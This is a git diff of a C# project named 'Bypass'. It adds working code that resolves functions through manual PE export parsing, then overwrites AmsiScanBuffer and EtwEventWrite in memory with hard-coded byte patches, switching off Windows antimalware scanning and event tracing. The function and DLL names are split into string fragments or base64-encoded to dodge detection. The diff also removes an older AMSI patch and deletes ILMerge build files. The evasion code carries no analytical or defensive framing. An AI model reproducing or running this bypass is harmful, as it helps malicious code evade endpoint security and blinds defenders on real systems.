+ TransactionAlreadyAborted = 0xc0190015,
+ TransactionAlreadyCommitted = 0xc0190016,
+ TransactionInvalidMarshallBuffer = 0xc0190017,
+ CurrentTransactionNotValid = 0xc0190018,
+ LogGrowthFailed = 0xc0190019,
+ ObjectNoLongerExists = 0xc0190021,
+ StreamMiniversionNotFound = 0xc0190022,
+ StreamMiniversionNotValid = 0xc0190023,
+ MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
+ CantOpenMiniversionWithModifyIntent = 0xc0190025,
+ CantCreateMoreStreamMiniversions = 0xc0190026,
+ HandleNoLongerValid = 0xc0190028,
+ NoTxfMetadata = 0xc0190029,
+ LogCorruptionDetected = 0xc0190030,
+ CantRecoverWithHandleOpen = 0xc0190031,
+ RmDisconnected = 0xc0190032,
+ EnlistmentNotSuperior = 0xc0190033,
+ RecoveryNotNeeded = 0xc0190034,
+ RmAlreadyStarted = 0xc0190035,
+ FileIdentityNotPersistent = 0xc0190036,
+ CantBreakTransactionalDependency = 0xc0190037,
+ CantCrossRmBoundary = 0xc0190038,
+ TxfDirNotEmpty = 0xc0190039,
+ IndoubtTransactionsExist = 0xc019003a,
+ TmVolatile = 0xc019003b,
+ RollbackTimerExpired = 0xc019003c,
+ TxfAttributeCorrupt = 0xc019003d,
+ EfsNotAllowedInTransaction = 0xc019003e,
+ TransactionalOpenNotAllowed = 0xc019003f,
+ TransactedMappingUnsupportedRemote = 0xc0190040,
+ TxfMetadataAlreadyPresent = 0xc0190041,
+ TransactionScopeCallbacksNotSet = 0xc0190042,
+ TransactionRequiredPromotion = 0xc0190043,
+ CannotExecuteFileInTransaction = 0xc0190044,
+ TransactionsNotFrozen = 0xc0190045,
+
+ MaximumNtStatus = 0xffffffff
}
- private static void pa(byte[] patch)
+ // Delegate NtProtectVirtualMemory
+ public class Delegates
+ {
+ [UnmanagedFunctionPointer(CallingConvention.StdCall)]
+ public delegate UInt32 NtProtectVirtualMemory(
+ IntPtr ProcessHandle,
+ ref IntPtr BaseAddress,
+ ref IntPtr RegionSize,
+ UInt32 NewProtect,
+ ref UInt32 OldProtect);
+ }
+
+ private static IntPtr GetLibraryAddress(string DLLName, string FunctionName)
+ {
+ IntPtr hModule = GetLoadedModuleAddress(DLLName);
+ if (hModule == IntPtr.Zero)
+ {
+ throw new DllNotFoundException(DLLName + ", Dll was not found or not loaded.");
+ }
+ IntPtr lastOutput = GetExportAddress(hModule, FunctionName);
+ return lastOutput;
+ }
+
+ private static IntPtr GetLoadedModuleAddress(string DLLName)
+ {
+ Process CurrentProcess = Process.GetCurrentProcess();
+ foreach (ProcessModule Module in CurrentProcess.Modules)
+ {
+ if (string.Compare(Module.ModuleName, DLLName, true) == 0)
+ {
+ IntPtr ModuleBasePointer = Module.BaseAddress;
+ return ModuleBasePointer;
+ }
+ }
+ return IntPtr.Zero;
+ }
+
+ private static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
+ {
+ IntPtr FunctionPtr = IntPtr.Zero;
+ try
+ {
+ // Traverse the PE header in memory
+ Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
+ Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
+ Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
+ Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
+ Int64 pExport = 0;
+ if (Magic == 0x010b)
+ {
+ pExport = OptHeader + 0x60;
+ }
+ else
+ {
+ pExport = OptHeader + 0x70;
+ }
+
+ // Read -> IMAGE_EXPORT_DIRECTORY
+ Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
+ Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
+ Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
+ Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
+ Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
+ Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
+ Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
+
+ // Loop the array of export name RVA's
+ for (int i = 0; i < NumberOfNames; i++)
+ {
+ string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
+ if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
+ {
+ Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
+ Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
+ FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
+ break;
+ }
+ }
+ }
+ catch
+ {
+ // Catch parser failure
+ throw new InvalidOperationException("Failed to parse module exports.");
+ }
+
+ if (FunctionPtr == IntPtr.Zero)
+ {
+ // Export not found
+ throw new MissingMethodException(ExportName + ", export not found.");
+ }
+ return FunctionPtr;
+ }
+
+ public static object DynamicAPIInvoke(string DLLName, string FunctionName, Type FunctionDelegateType, ref object[] Parameters)
+ {
+ IntPtr pFunction = GetLibraryAddress(DLLName, FunctionName);
+ if (pFunction == IntPtr.Zero)
+ {
+ throw new InvalidOperationException("Could not get the handle for the function.");
+ }
+ return DynamicFunctionInvoke(pFunction, FunctionDelegateType, ref Parameters);
+ }
+
+ private static object DynamicFunctionInvoke(IntPtr FunctionPointer, Type FunctionDelegateType, ref object[] Parameters)
+ {
+ Delegate funcDelegate = Marshal.GetDelegateForFunctionPointer(FunctionPointer, FunctionDelegateType);
+ return funcDelegate.DynamicInvoke(Parameters);
+ }
+
+ public static bool NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect)
+ {
+ // Craft an array for the arguments
+ OldProtect = 0;
+ object[] funcargs = { ProcessHandle, BaseAddress, RegionSize, NewProtect, OldProtect };
+
+ NTSTATUS retValue = (NTSTATUS)DynamicAPIInvoke(@"ntdll.dll", @"NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref funcargs);
+ if (retValue != NTSTATUS.Success)
+ {
+ return false;
+ }
+
+ OldProtect = (UInt32)funcargs[4];
+ return true;
+ }
+ }
+ public class A
+ {
+
+ static byte[] x64_etw_patch = new byte[] { 0x48, 0x33, 0xC0, 0xC3 };
+ static byte[] x86_etw_patch = new byte[] { 0x33, 0xc0, 0xc2, 0x14, 0x00 };
+ static byte[] x64_am_si_patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
+ static byte[] x86_am_si_patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
+
+ // Thx D/Invoke!
+ private static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
+ {
+ IntPtr FunctionPtr = IntPtr.Zero;
+ try
+ {
+ // Traverse the PE header in memory
+ Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));
+ Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14));
+ Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
+ Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
+ Int64 pExport = 0;
+ if (Magic == 0x010b)
+ {
+ pExport = OptHeader + 0x60;
+ }
+ else
+ {
+ pExport = OptHeader + 0x70;
+ }
+
+ // Read -> IMAGE_EXPORT_DIRECTORY
+ Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
+ Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
+ Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14));
+ Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
+ Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
+ Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
+ Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));
+
+ // Loop the array of export name RVA's
+ for (int i = 0; i < NumberOfNames; i++)
+ {
+ string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
+ if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
+ {
+ Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
+ Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
+ FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
+ break;
+ }
+ }
+ }
+ catch
+ {
+ // Catch parser failure
+ throw new InvalidOperationException("Failed to parse module exports.");
+ }
+
+ if (FunctionPtr == IntPtr.Zero)
+ {
+ // Export not found
+ throw new MissingMethodException(ExportName + " not found.");
+ }
+ return FunctionPtr;
+ }
+
+ private static string decode(string b64encoded)
+ {
+ return System.Text.ASCIIEncoding.ASCII.GetString(System.Convert.FromBase64String(b64encoded));
+ }
+
+ private static void PatchMem(byte[] patch, string library, string function)
{
try
{
- string liba = Encoding.Default.GetString(Convert.FromBase64String("YW1zaS5kbGw="));
- var lib = Win32.LDLibraryA(ref liba);//Amsi.dll
- string addra = Encoding.Default.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI="));
- var addr = Win32.GetProcAddress(lib, ref addra);//AmsiScanBuffer
-
- uint oldProtect;
- Win32.VirtualAllocEx(addr, (UIntPtr)patch.Length, 0x40, out oldProtect);
-
- Marshal.Copy(patch, 0, addr, patch.Length);
+ IntPtr CurrentProcessHandle = new IntPtr(-1); // pseudo-handle for current process handle
+ IntPtr libPtr = (Process.GetCurrentProcess().Modules.Cast().Where(x => library.Equals(Path.GetFileName(x.FileName), StringComparison.OrdinalIgnoreCase)).FirstOrDefault().BaseAddress);
+ IntPtr funcPtr = GetExportAddress(libPtr, function);
+ IntPtr patchLength = new IntPtr(patch.Length);
+ UInt32 oldProtect = 0;
+ DInvokeCore.NtProtectVirtualMemory(CurrentProcessHandle, ref funcPtr, ref patchLength, 0x40, ref oldProtect);
+ Marshal.Copy(patch, 0, funcPtr, patch.Length);
}
catch (Exception e)
{
- Console.WriteLine(" [x] {0}", e.Message);
- Console.WriteLine(" [x] {0}", e.InnerException);
+ Console.WriteLine(" [!] {0}", e.Message);
+ Console.WriteLine(" [!] {0}", e.InnerException);
}
}
- private static bool i64()
+ private static void Patcham_si(byte[] patch)
{
- bool i64 = true;
+ string dll = decode("YW1zaS5kbGw=");
+ foreach (ProcessModule CurrentModule in (Process.GetCurrentProcess().Modules))
+ {
+ if (CurrentModule.ModuleName == dll)
+ {
+ PatchMem(patch, dll, ("Am" + "si" + "Sc" + "an" + "Bu" + "ff" + "er"));
+ }
+ }
+ }
+ private static void PatchETW(byte[] Patch)
+ {
+ PatchMem(Patch, ("n" + "t" + "d" + "l" + "l" + "." + "d" + "l" + "l"), ("Et" + "wE" + "ve" + "nt" + "Wr" + "it" + "e"));
+ }
+
+ public static void B()
+ {
+ bool isit64bit;
if (IntPtr.Size == 4)
- i64 = false;
-
- return i64;
+ {
+ isit64bit = false;
+ }
+ else
+ {
+ isit64bit = true;
+ }
+ if (isit64bit)
+ {
+ Patcham_si(x64_am_si_patch);
+ PatchETW(x64_etw_patch);
+ }
+ else
+ {
+ Patcham_si(x86_am_si_patch);
+ PatchETW(x86_etw_patch);
+ }
}
}
- class Win32
- {
- //[DllImport("kernel32")]
- //public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
-
- //[DllImport("kernel32")]
- //public static extern IntPtr LDLibrary(string name);
-
-
- public static readonly DelegateVirtualProtect VirtualAllocEx = LDApi("kernel32", Encoding.Default.GetString(Convert.FromBase64String("VmlydHVhbFByb3RlY3Q=")));//VirtualProtect
-
- public delegate int DelegateVirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
-
- #region CreateAPI
- [DllImport("kernel32", SetLastError = true)]
- public static extern IntPtr LDLibraryA([MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
-
- [DllImport("kernel32", CharSet = CharSet.Ansi, SetLastError = true, ExactSpelling = true)]
- public static extern IntPtr GetProcAddress(IntPtr hProcess, [MarshalAs(UnmanagedType.VBByRefStr)] ref string Name);
- public static CreateApi LDApi(string name, string method)
- {
- return (CreateApi)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LDLibraryA(ref name), ref method), typeof(CreateApi));
- }
- #endregion
- }
}
diff --git a/Bypass/Properties/AssemblyInfo.cs b/Bypass/Properties/AssemblyInfo.cs
index f651fb2..6945c82 100644
--- a/Bypass/Properties/AssemblyInfo.cs
+++ b/Bypass/Properties/AssemblyInfo.cs
@@ -9,7 +9,7 @@ using System.Runtime.InteropServices;
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
-[assembly: AssemblyProduct("")]
+[assembly: AssemblyProduct("Program")]
[assembly: AssemblyCopyright("Copyright © 2021")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
@@ -20,7 +20,7 @@ using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
// 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
-[assembly: Guid("6f5245be-37ec-4cfb-8f6f-03ed38215d0a")]
+[assembly: Guid("4541d820-539a-4e4e-a37b-a20ae0b56376")]
// 程序集的版本信息由下列四个值组成:
//
diff --git a/Bypass/app.manifest b/Bypass/app.manifest
index c7cd7fe..e13f4ab 100644
--- a/Bypass/app.manifest
+++ b/Bypass/app.manifest
@@ -1,10 +1,10 @@
-
-
-
-
-
-
-
-
-
+
+
+
+
-
-
-
-
-
+
+
-
-
+
+
-
-
+
+
-
-
+
+
-
-
+
+
-
-
+
+
-
-
-
- true
- true
-
-
+
+
+ true
+ true
+
+
-
-
+
-
-
- $(MSBuildProjectDirectory)\$(MSBuildProjectName).ILMerge.props
- $(MSBuildProjectDirectory)\ILMerge.props
-
-
-
-
\ No newline at end of file
diff --git a/packages/MSBuild.ILMerge.Task.1.1.3/build/MSBuild.ILMerge.Task.targets b/packages/MSBuild.ILMerge.Task.1.1.3/build/MSBuild.ILMerge.Task.targets
deleted file mode 100644
index 29e52dc..0000000
--- a/packages/MSBuild.ILMerge.Task.1.1.3/build/MSBuild.ILMerge.Task.targets
+++ /dev/null
@@ -1,116 +0,0 @@
-
-
-
-
- $(SolutionDir)packages
- $(MSBuildProjectDirectory)\ILMergeOrder.txt
- $(AssemblyOriginatorKeyFile)
-
-
-
- false
- false
- false
- true
- false
- 512
- false
-
- false
- true
- true
-
- false
- 40
-
-
- $(MSBuildThisFileDirectory)..\tools\
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- @(IntermediateAssembly->'%(FullPath)');@(MergedAssemblies->'%(FullPath)');@(MergedDependencies->'%(FullPath)')
-
-
- @(IntermediateAssembly->'%(FullPath)');@(MergedAssemblies->'%(FullPath)')
-
-
-
-
-
- @(UnmergedAssemblies->'%(FullPath)')
- $(TargetPath)
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMerge.props b/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMerge.props
deleted file mode 100644
index aaadb12..0000000
--- a/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMerge.props
+++ /dev/null
@@ -1,67 +0,0 @@
-
-
-
-
-
-
-
-
-
-
- true
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
diff --git a/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMergeOrder.txt b/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMergeOrder.txt
deleted file mode 100644
index 3fda7f5..0000000
--- a/packages/MSBuild.ILMerge.Task.1.1.3/content/ILMergeOrder.txt
+++ /dev/null
@@ -1,4 +0,0 @@
-# this file contains the partial list of the merged assemblies in the merge order
-# you can fill it from the obj\CONFIG\PROJECT.ilmerge generated on every build
-# and finetune merge order to your satisfaction
-
diff --git a/packages/MSBuild.ILMerge.Task.1.1.3/tools/MSBuild.ILMerge.Task.dll b/packages/MSBuild.ILMerge.Task.1.1.3/tools/MSBuild.ILMerge.Task.dll
deleted file mode 100644
index ca28b04..0000000
Binary files a/packages/MSBuild.ILMerge.Task.1.1.3/tools/MSBuild.ILMerge.Task.dll and /dev/null differ